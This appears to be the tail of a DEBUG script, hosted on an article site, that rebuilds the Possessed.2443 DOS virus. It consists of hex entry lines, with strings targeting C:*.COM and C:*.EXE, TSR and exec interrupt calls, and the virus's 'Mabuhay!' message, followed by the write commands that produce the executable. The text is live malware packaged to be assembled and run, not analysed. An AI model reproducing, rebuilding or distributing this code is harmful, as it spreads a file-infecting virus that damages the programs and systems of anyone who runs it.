E 0690 00 C7 06 7F 01 BD 00 C7 06 81 01 01 00 E8 02 00
E 06A0 EB B0 56 B0 01 B9 02 00 51 56 8A 1C 0A DB 74 16
E 06B0 8B CB 03 0E 7F 01 8A 54 01 03 16 81 01 B4 0C CD
E 06C0 10 83 C6 02 EB E4 5E 32 C0 59 E2 DC 5E C3 C7 44
E 06D0 12 70 19 8B 44 0E 05 10 00 2E A3 73 00 8B 44 10
E 06E0 2E A3 75 00 8B 44 14 2E A3 79 00 8B 44 16 05 10
E 06F0 00 2E A3 77 00 8B 44 04 83 7C 02 00 74 01 48 BB
E 0700 00 02 F7 E3 03 44 02 83 D2 00 05 0F 00 83 D2 00
E 0710 25 F0 FF 2E A3 7B 00 2E 89 16 7D 00 05 8B 09 83
E 0720 D2 00 72 5E F7 F3 0B D2 74 01 40 89 44 04 89 54
E 0730 02 2E A1 7B 00 2E 8B 16 7D 00 BB 10 00 F7 F3 2B
E 0740 44 08 2D 10 00 89 44 16 C7 44 14 15 08 89 44 0E
E 0750 C7 44 10 8B 0A 2E 8B 1E 61 00 E8 56 00 B9 1C 00
E 0760 33 D2 B4 40 E8 31 00 0E 1F 8B 16 7B 00 8B 0E 7D
E 0770 00 B8 00 42 E8 21 00 BA 00 00 B9 8B 09 B4 40 E8
E 0780 16 00 E9 5B FD 33 C0 8E C0 26 8E 16 F6 01 26 8B
E 0790 26 F4 01 58 07 5D F9 C3 55 06 50 33 C0 8E C0 26
E 07A0 89 26 F4 01 26 8C 16 F6 01 58 07 9C 2E FF 1E 4F
E 07B0 00 5D C3 33 C9 8B D1 B8 00 42 E8 DB FF C3 B4 02
E 07C0 33 DB CD 10 C3 51 56 28 04 46 E2 FB 5E 59 C3 56
E 07D0 51 FC F3 A6 74 01 F9 59 5E C3 5A 66 64 64 58 65
E 07E0 5B 45 5A 66 64 32 75 74 78 78 6A 78 78 6A 69 46
E 07F0 45 67 9C 86 46 45 8D 86 46 45 8D 86 46 45 8D 86
E 0800 46 45 8D 86 46 49 2D 45 2F 32 66 9A 99 8D 94 97
E 0810 5F 45 6F 94 93 6F 94 93 45 6C 9A 92 87 86 45 94
E 0820 8B 45 66 89 7A 2F 3F 41 4B 42 4B 42 4C 43 4C 44
E 0830 4C 45 4C 43 4D 46 4D 47 4D 44 4E 48 4E 49 4E 4A
E 0840 4E 45 4F 4B 4F 4C 4F B6 4A B5 4A B5 4B B4 4B B3
E 0850 4B B2 4B B4 4C B1 4C B0 4C B3 4D AF 4D AE 4D AD
E 0860 4D B2 4E AC 4E AB 4E 4C 54 4C 55 4D 55 4E 55 4F
E 0870 56 50 56 51 56 52 56 53 56 54 57 55 57 56 57 57
E 0880 57 58 57 59 58 5A 58 5B 58 5C 58 5D 58 5A 59 5B
E 0890 59 5C 59 5D 59 60 59 5F 59 60 59 61 59 62 59 5B
E 08A0 5A 5C 5A 63 5A 64 5A 65 5A 66 5A 67 5A 5C 5B 68
E 08B0 5B 69 5B 6A 5B 6B 5B 6C 5B 6D 5C 6E 5C 6F 5C 70
E 08C0 5D B1 53 B0 54 AF 54 AE 54 AD 55 AC 55 AB 55 AA
E 08D0 55 A9 55 A8 55 A7 56 A6 56 A5 56 A4 56 A3 56 A2
E 08E0 57 A1 57 A0 57 9F 57 9E 57 9D 57 9C 58 9B 58 9A
E 08F0 58 99 58 98 58 9A 59 99 59 98 59 97 59 96 59 95
E 0900 59 94 59 93 59 92 59 99 5A 98 5A 91 5A 90 5A 8F
E 0910 5A 8E 5A 8D 5A 98 5B 8C 5B 8B 5B 8A 5B 89 5B 88
E 0920 5B 87 5B 86 5C 85 5C 84 5C 83 5C 76 63 75 64 75
E 0930 65 74 66 74 67 73 68 73 69 72 6A 71 6B 71 6C 70
E 0940 6D 70 6E 6F 6F 6E 70 6E 71 7B 71 6D 72 7A 72 79
E 0950 72 6D 73 78 73 77 73 76 73 75 73 6C 74 71 74 72
E 0960 74 73 74 74 74 6C 75 6D 75 6E 75 6F 75 70 75 6B
E 0970 76 6C 76 6D 81 6E 81 6F 81 70 80 71 80 72 80 73
E 0980 80 74 7F 75 7F 76 7F 77 7F 78 7E 79 7E 7A 7E 7B
E 0990 7E 7C 7D 7D 7D 7E 7D 7F 7D 80 7D 81 7C 82 7C 83
E 09A0 7C 84 7C 85 7B 86 7B 87 7B 88 7B 89 7A 8A 7A 8B
E 09B0 7A 8C 7A 8D 79 8E 79 8F 79 90 79 91 78 92 78 93
E 09C0 78 94 77 95 77 96 76 97 76 98 75 00 43 3A 2A 2E
E 09D0 43 4F 4D 00 43 3A 2A 2E 45 58 45 00 06 33 C0 8E
E 09E0 C0 26 80 3E EC 01 00 75 06 BE 00 01 E9 E8 01 07
E 09F0 8C C0 2E 03 06 73 01 8E D0 2E 8B 26 75 01 8C C0
E 0A00 2E 03 06 77 01 2E A3 51 01 2E A1 79 01 2E A3 4F
E 0A10 01 F8 2E FF 2E 4F 01 FC F3 A4 33 C0 8E C0 26 C6
E 0A20 06 EC 01 01 58 05 10 00 50 B8 67 07 50 CB 8B C4
E 0A30 2D 00 01 8B E0 8C C8 8E D8 8E D0 1E 2D 10 00 8E
E 0A40 C0 8C 06 81 00 50 26 A1 2C 00 A3 7F 00 58 1E 06
E 0A50 8E D8 0E 07 BE 0A 00 BF 8B 09 B9 06 00 FC F3 A5
E 0A60 BB 19 08 89 1E 0A 00 8C 0E 0C 00 07 1F 07 BE 1E
E 0A70 05 B9 42 00 51 B0 25 E8 4B FD BF 08 00 56 FC F3
E 0A80 A4 5E 59 F6 D8 E8 3D FD A1 15 07 05 1B 02 CD 21
E 0A90 89 1E 4F 00 8C 06 51 00 BA 4A 00 80 EC 10 E8 F7
E 0AA0 FC C7 06 6B 00 00 00 8A 16 6E 00 88 16 6D 00 05
E 0AB0 E7 0F E8 E3 FC 89 1E 53 00 8C 06 55 00 BA 6A 03
E 0AC0 80 EC 10 E8 D2 FC 0E 1F 8E 06 81 00 B4 49 E8 C7
E 0AD0 FC BA 8B 09 B1 04 D3 EA 83 C2 20 B4 31 E8 B8 FC
E 0AE0 0E 0E 1F 8E 06 81 00 BE 8B 09 BF 0A 00 B9 06 00
E 0AF0 FC F3 A5 07 80 3E 4E 00 01 75 08 C6 06 4E 00 00
E 0B00 E9 97 00 A1 81 00 BE 9A 09 89 44 04 C7 44 02 80
E 0B10 00 89 44 08 C7 44 06 5C 00 89 44 0C C7 44 0A 6C
E 0B20 00 A1 7F 00 89 04 B4 30 CD 21 A2 4D 00 3C 03 72
E 0B30 1F 8E 1E 7F 00 33 F6 B9 C8 00 80 3C 01 75 0E 80
E 0B40 7C 03 3A 75 08 8B D6 83 C2 02 EB 15 90 46 E2 EA
E 0B50 0E 1F BE DB 08 BF 8D 09 B9 0D 00 FC F3 A4 BA 8D
E 0B60 09 FA 2E 8C 16 6F 00 2E 89 26 71 00 FB B8 00 4B
E 0B70 BB 9A 09 2E 80 3E 4D 00 03 72 06 E8 1A FC EB 03
E 0B80 90 CD 21 FA 2E 8E 16 6F 00 2E 8B 26 71 00 FB 0E
E 0B90 1F 73 07 BA 08 00 B4 09 CD 21 B4 4D CD 21 B4 4C
E 0BA0 CD 21 50 4F 53 32 34 34 33 2E 43 4F 4D 00 00 81
E 0BB0 C6 00 01 06 33 C0 8E C0 26 83 3E EC 01 00 74 13
E 0BC0 07 83 EE 5A BF 00 01 B9 2D 00 FC F3 A5 BB 00 01
E 0BD0 F8 FF E3 81 EE 8B 09 07 0E 1F BF 00 01 B9 10 09
E 0BE0 D1 E9 FC F3 A5 B9 7B 00 8C 06 51 01 C7 06 4F 01
E 0BF0 50 08 06 2E FF 2E 4F 01 E9 B7 01 0D 20 20 20 0D
E 0C00 0A 4D 61 62 75 68 61 79 21 0D 0A 0A 54 68 69 73
E 0C10 20 69 73 20 50 6F 73 73 65 73 73 65 64 2E 32 34
E 0C20 34 33 20 76 69 72 75 73 20 63 6F 6D 69 6E 67 20
E 0C30 74 6F 20 79 6F 75 20 66 72 6F 6D 20 74 68 65 20
E 0C40 50 68 69 6C 69 70 70 69 6E 65 73 2E 0D 0A 42 72
E 0C50 6F 75

RCX
0B52
W
Q

ÄÄ POS2443.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

EoF.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT